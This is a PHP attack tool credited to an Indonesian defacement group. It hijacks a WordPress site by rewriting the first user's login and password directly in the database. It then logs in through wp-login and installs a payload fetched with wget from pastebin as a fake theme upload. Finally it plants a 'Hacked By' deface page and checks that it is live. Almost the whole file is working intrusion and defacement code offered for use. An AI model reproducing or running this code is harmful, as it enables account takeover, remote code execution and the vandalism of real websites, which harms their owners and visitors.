wp2.php

1. <?php
2. //Tu5b0l3d
3. //IndoXPloit, HNc
4. //http://indoxploit.blogspot.co.id/2015/10/auto-edit-user-and-deface-in-wordpress.html
5.  
6.     if($_POST){
7.         $host = $_POST['host'];
8.         $username = $_POST['username'];
9.         $password = $_POST['password'];
10.         $db = $_POST['db'];
11.         $dbprefix = $_POST['dbprefix'];
12.         $user_baru = $_POST['user_baru'];
13.         $password_baru = $_POST['password_baru'];
14.         $prefix = $db.".".$dbprefix."users";
15.         $sue = $db.".".$dbprefix."options";
16.          $tanya = $_POST['tanya'];
17.          $target = $_POST['target'];
18.          $nick = $_POST['nick'];
19.         $pass = md5("$password_baru");
20.        
21.  
22.         mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
23.         mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
24.  
25.         $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
26.         $r=mysql_fetch_array($tampil);
27.         $id = $r[ID];
28.  
29.         $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
30.         $r2=mysql_fetch_array($tampil2);
31.         $target = $r2[option_value];
32.        
33.  
34.          mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
35.  
36.          
37.  
38.  
39.             if($tanya=="y"){
40.  
41.     function ambilKata($param, $kata1, $kata2){
42.     if(strpos($param, $kata1) === FALSE) return FALSE;
43.     if(strpos($param, $kata2) === FALSE) return FALSE;
44.     $start = strpos($param, $kata1) + strlen($kata1);
45.     $end = strpos($param, $kata2, $start);
46.     $return = substr($param, $start, $end - $start);
47.     return $return;
48. }
49.  
50.     function anucurl($sites){
51.         $ch1 = curl_init ("$sites");
52. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
53. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
54. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
55. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
56. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
57. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
58. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
59. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
60. $data = curl_exec ($ch1);
61. return $data;
62.     }
63.  
64.     function lohgin($cek, $web, $userr, $pass){
65.         $post = array(
66.                     "log" => "$userr",
67.                     "pwd" => "$pass",
68.                     "rememberme" => "forever",
69.                     "wp-submit" => "Log In",
70.                     "redirect_to" => "$web/wp-admin/",
71.                     "testcookie" => "1",
72.                     );
73. $ch = curl_init ("$cek");
74. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
75. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
76. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
77. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
78. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
79. curl_setopt ($ch, CURLOPT_POST, 1);
80. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
81. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
82. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
83. $data6 = curl_exec ($ch);
84. return $data6;
85.     }
86.  
87. $site= "$target/wp-login.php";
88. $site2= "$target/wp-admin/theme-install.php?upload";
89. $a = lohgin($site, $target, $user_baru, $password_baru);
90. $b = lohgin($site2, $target, $user_baru, $password_baru);
91.            
92.  
93. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
94. echo "# token -> $anu2<br>";
95.  
96.  
97.  system('wget http://pastebin.com/raw.php?i=mEQP6prW');
98.  system('cp raw.php?i=mEQP6prW m.php');
99.    
100.   $post2 = array(
101.                     "_wpnonce" => "$anu2",
102.                     "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
103.                     "themezip" => "@m.php",
104.                     "install-theme-submit" => "Install Now",
105.                     );
106. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
107. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
108. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
109. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
110. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
111. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
112. curl_setopt ($ch, CURLOPT_POST, 1);
113. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
114. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
115. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
116. $data3 = curl_exec ($ch);
117.  
118. $namafile = "wew.php";
119. $fp2 = fopen($namafile,"w");
120. fputs($fp2,$nick);
121.  
122. $y = date("Y");
123. $m = date("m");
124.  
125.  
126. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
127. curl_setopt($ch6, CURLOPT_POST, true);
128. curl_setopt($ch6, CURLOPT_POSTFIELDS,
129. array('file3'=>"@$namafile"));
130. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
131. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
132. $postResult = curl_exec($ch6);
133. curl_close($ch6);
134.  
135. $as = "$target/k.php";
136. $bs = file_get_contents($as);
137.  if(preg_match("#hacked#si",$bs)){
138.                         echo "# <font color='green'>berhasil mepes...</font><br>";
139.                         echo "# $target/k.php<br>";
140.                     }
141.                     else{
142.                         echo "# <font color='red'>gagal mepes...</font><br>";
143.                         echo "# coba aja manual: <br>";
144.                         echo "# $target/wp-login.php<br>";
145.                         echo "# username: $user_baru<br>";
146.                         echo "# password: $password_baru<br>";
147.  
148.                        
149.                     }
150.  
151.  
152.  
153.  
154.         }
155.  
156.         elseif($tanya=="n"){
157.             echo "# Sukses<br>";
158.             echo "# username: $user_baru<br>";
159.             echo "# password: $password_baru<br>";
160.         }
161.  
162.  
163.  
164.     }else{
165.             echo '<html>
166.     <head>
167.         <title>Wordpress Created New User</title>
168.     </head>
169.  
170.     <body>
171.             <center>
172.                 <center><div id="button"></div>
173.                         <h2>Wordpress Created New User</h2>
174.                         <table>
175.                             <tr><td><form method="post" action="?action"></td></tr>
176.                             <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
177.                             <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
178.                             <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
179.                             <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
180.                             <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
181.                             <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
182.                             <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
183.                               <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
184.                          
185.                             <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
186.                             <tr><td><input type="submit" value="Ganti"></td></tr>
187.                         </table>
188.                         *nb: kalo milih y ... silahkan Ganti Form Hacked By Tu5b0l3d jadi Hacked by Nick_ente
189.             </center>
190.     </body>';
191.         }
192.  
193. ?>